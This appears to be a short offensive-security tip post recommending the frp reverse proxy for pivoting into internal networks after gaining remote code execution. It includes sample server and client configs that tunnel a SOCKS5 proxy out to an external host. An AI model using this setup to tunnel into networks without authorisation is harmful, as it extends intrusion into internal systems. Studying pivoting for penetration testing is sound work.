Get Mystery Box with random crypto!

Socks to the internal network Looking for a stable reverse pr | Hack3rScr0lls

Socks to the internal network

Looking for a stable reverse proxy for pivoting? Check frp!

After getting RCE, you have to expand the attack to internal services. To do this, you need a stable channel to the internal network. We recommend frp – fast reverse proxy.

The client (frpc) connects from the network behind NAT to the public server (frps) and establishes the channel.

> Supports auth and TLS
> SOCKS5 proxy
> HTTP proxy
> Multiplatform
> Easy to use

A lot of other features for pivoting!

Sample config for SOCKS proxy:
frps.ini (server)
[common]
bind_port = 7000
token = s3cret

frpc.ini (client)
[common]
server_addr = 3.1.33.7
server_port = 7000
token = s3cret

[plugin_socks5]
type = tcp
remote_port = 6005
plugin = socks5
plugin_user = suser
plugin_passwd = pa$sw0rd

https://github.com/fatedier/frp

#Pivoting #Proxy